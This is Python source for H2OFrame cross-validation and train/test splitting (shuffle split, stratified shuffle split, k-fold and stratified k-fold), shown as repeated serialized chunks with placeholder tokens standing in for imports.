\n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
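The contiguous fold sizing in _iter_test_indices above is plain integer arithmetic: every fold gets n_obs // n_folds rows and the first n_obs % n_folds folds absorb one extra row each. A standalone sketch (NumPy only; note np.int is spelled int here, since that alias was removed in newer NumPy releases):

import numpy as np

n_obs, n_folds = 10, 3
indices = np.arange(n_obs)

fold_sizes = (n_obs // n_folds) * np.ones(n_folds, dtype=int)
fold_sizes[:n_obs % n_folds] += 1   # spread the remainder over the first folds

current = 0
for fold_size in fold_sizes:
    start, stop = current, current + fold_size
    print(indices[start:stop])      # [0 1 2 3], then [4 5 6], then [7 8 9]
    current = stop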
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n\n\ndef _build_repr(self):\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n init_signature = signature(init)\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values() if\n p.name != 'self' and p.kind != p.VAR_KEYWORD])\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n warnings.simplefilter('always', DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n\n\ndef check_cv(cv=3):\n \"\"\"Checks the ``cv`` parameter to determine\n whether it's a valid int or H2OBaseCrossValidator.\n\n Parameters\n ----------\n\n cv : int or H2OBaseCrossValidator, optional (default=3)\n The number of folds or the H2OBaseCrossValidator\n instance.\n\n Returns\n -------\n\n cv : H2OBaseCrossValidator\n The instance of H2OBaseCrossValidator\n \"\"\"\n if cv is None:\n cv = 3\n if isinstance(cv, numbers.Integral):\n return H2OKFold(cv)\n if not isinstance(cv, H2OBaseCrossValidator):\n raise ValueError(\n 'expected int or instance of H2OBaseCrossValidator but got %s' %\n type(cv))\n return cv\n\n\ndef h2o_train_test_split(frame, test_size=None, train_size=None,\n random_state=None, stratify=None):\n \"\"\"Splits an H2OFrame into random train and test subsets\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n test_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n If train size is also None, test size is set to 0.25\n\n train_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. 
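check_cv above is the usual int-or-instance normalizer: None falls back to 3, integral values are wrapped in an H2OKFold, and anything else must already be a cross validator. A stripped-down sketch of the same dispatch pattern with stand-in classes (the names below are illustrative stand-ins, not part of the module):

import numbers

class BaseCV(object):          # stand-in for H2OBaseCrossValidator
    pass

class KFoldCV(BaseCV):         # stand-in for H2OKFold
    def __init__(self, n_folds):
        self.n_folds = n_folds

def normalize_cv(cv=3):
    if cv is None:
        cv = 3
    if isinstance(cv, numbers.Integral):
        return KFoldCV(int(cv))        # ints become a k-fold splitter
    if not isinstance(cv, BaseCV):
        raise ValueError('expected int or BaseCV, got %r' % type(cv))
    return cv                          # validators pass through untouched

print(normalize_cv(None).n_folds)  # 3
print(normalize_cv(5).n_folds)     # 5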
If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n stratify : str or None (default=None)\n The name of the target on which to stratify the sampling\n\n Returns\n -------\n\n out : tuple, shape=(2,)\n training_frame : H2OFrame\n The training fold split\n\n testing_frame : H2OFrame\n The testing fold split\n \"\"\"\n frame = check_frame(frame, copy=False)\n if test_size is None and train_size is None:\n test_size = 0.25\n if stratify is not None:\n CVClass = H2OStratifiedShuffleSplit\n else:\n CVClass = H2OShuffleSplit\n cv = CVClass(n_splits=2, test_size=test_size, train_size=train_size,\n random_state=random_state)\n tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0]\n train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1]))\n out = frame[train, :], frame[test, :]\n return out\n\n\n<assignment token>\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\ndef _validate_shuffle_split_init(test_size, train_size):\n \"\"\"Validation helper to check the test_size and train_size at init\"\"\"\n if test_size is None and train_size is None:\n raise ValueError('test_size and train_size can not both be None')\n if test_size is not None:\n if np.asarray(test_size).dtype.kind == 'f':\n if test_size >= 1.0:\n raise ValueError(\n 'test_size=%f should be smaller than 1.0 or be an integer'\n % test_size)\n elif np.asarray(test_size).dtype.kind != 'i':\n raise ValueError('Invalid value for test_size: %r' % test_size)\n if train_size is not None:\n if np.asarray(train_size).dtype.kind == 
'f':\n if train_size >= 1.0:\n raise ValueError(\n 'train_size=%f should be smaller than 1.0 or be an integer'\n % train_size)\n elif np.asarray(test_size\n ).dtype.kind == 'f' and train_size + test_size > 1.0:\n raise ValueError(\n 'The sum of test_size and train_size = %f should be smaller than 1.0. Reduce test_size and/or train_size.'\n % (train_size + test_size))\n elif np.asarray(train_size).dtype.kind != 'i':\n raise ValueError('Invalid value for train_size: %r' % train_size)\n\n\ndef _validate_shuffle_split(n_samples, test_size, train_size):\n if test_size is not None and np.asarray(test_size\n ).dtype.kind == 'i' and test_size >= n_samples:\n raise ValueError(\n 'test_size=%d should be smaller than the number of samples %d' %\n (test_size, n_samples))\n if train_size is not None and np.asarray(train_size\n ).dtype.kind == 'i' and train_size >= n_samples:\n raise ValueError(\n 'train_size=%d should be smaller than the number of samples %d' %\n (train_size, n_samples))\n if np.asarray(test_size).dtype.kind == 'f':\n n_test = ceil(test_size * n_samples)\n elif np.asarray(test_size).dtype.kind == 'i':\n n_test = float(test_size)\n if train_size is None:\n n_train = n_samples - n_test\n elif np.asarray(train_size).dtype.kind == 'f':\n n_train = floor(train_size * n_samples)\n else:\n n_train = float(train_size)\n if test_size is None:\n n_test = n_samples - n_train\n if n_train + n_test > n_samples:\n raise ValueError(\n 'The sum of train_size and test_size=%d, should be smaller than the number of samples %d. Reduce test_size and/or train_size.'\n % (n_train + n_test, n_samples))\n return int(n_train), int(n_test)\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. 
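The float-versus-int handling in _validate_shuffle_split is worth tracing once: float sizes are treated as proportions (ceil for the test side, floor for the train side), ints are taken as absolute row counts, and whichever side is None is filled with the complement. A runnable sketch of the happy path, with the error branches elided and test_size assumed non-None:

import numpy as np
from math import ceil, floor

def resolve_sizes(n_samples, test_size, train_size=None):
    # floats are proportions; ints are absolute row counts
    if np.asarray(test_size).dtype.kind == 'f':
        n_test = ceil(test_size * n_samples)
    else:
        n_test = float(test_size)
    if train_size is None:
        n_train = n_samples - n_test       # complement of the test side
    elif np.asarray(train_size).dtype.kind == 'f':
        n_train = floor(train_size * n_samples)
    else:
        n_train = float(train_size)
    return int(n_train), int(n_test)

print(resolve_sizes(100, 0.25))      # (75, 25)
print(resolve_sizes(100, 10, 0.5))   # (50, 10)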
\n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
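The stratified k-fold assignment in _make_test_folds runs one vanilla KFold per class over that class's rows and zips the per-class splits together, so fold i receives a proportional slice of every label. A compact sketch of that idea against the modern scikit-learn API (this mirrors the SK18 branch of the source and assumes scikit-learn is installed):

import numpy as np
from sklearn.model_selection import KFold

target = np.array(['a'] * 6 + ['b'] * 6)
n_folds = 3
test_folds = np.zeros(target.shape[0], dtype=int)

# One KFold per class; fold i's test chunk from every class lands in fold i.
per_cls_cvs = [
    KFold(n_splits=n_folds).split(np.zeros(np.sum(target == cls)))
    for cls in np.unique(target)
]
for fold_idx, per_cls_splits in enumerate(zip(*per_cls_cvs)):
    for cls, (_, test_split) in zip(np.unique(target), per_cls_splits):
        cls_rows = np.where(target == cls)[0]
        test_folds[cls_rows[test_split]] = fold_idx

print(test_folds)  # [0 0 1 1 2 2 0 0 1 1 2 2]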
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n\n\ndef _build_repr(self):\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n init_signature = signature(init)\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values() if\n p.name != 'self' and p.kind != p.VAR_KEYWORD])\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n warnings.simplefilter('always', DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n\n\ndef check_cv(cv=3):\n \"\"\"Checks the ``cv`` parameter to determine\n whether it's a valid int or H2OBaseCrossValidator.\n\n Parameters\n ----------\n\n cv : int or H2OBaseCrossValidator, optional (default=3)\n The number of folds or the H2OBaseCrossValidator\n instance.\n\n Returns\n -------\n\n cv : H2OBaseCrossValidator\n The instance of H2OBaseCrossValidator\n \"\"\"\n if cv is None:\n cv = 3\n if isinstance(cv, numbers.Integral):\n return H2OKFold(cv)\n if not isinstance(cv, H2OBaseCrossValidator):\n raise ValueError(\n 'expected int or instance of H2OBaseCrossValidator but got %s' %\n type(cv))\n return cv\n\n\ndef h2o_train_test_split(frame, test_size=None, train_size=None,\n random_state=None, stratify=None):\n \"\"\"Splits an H2OFrame into random train and test subsets\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n test_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n If train size is also None, test size is set to 0.25\n\n train_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. 
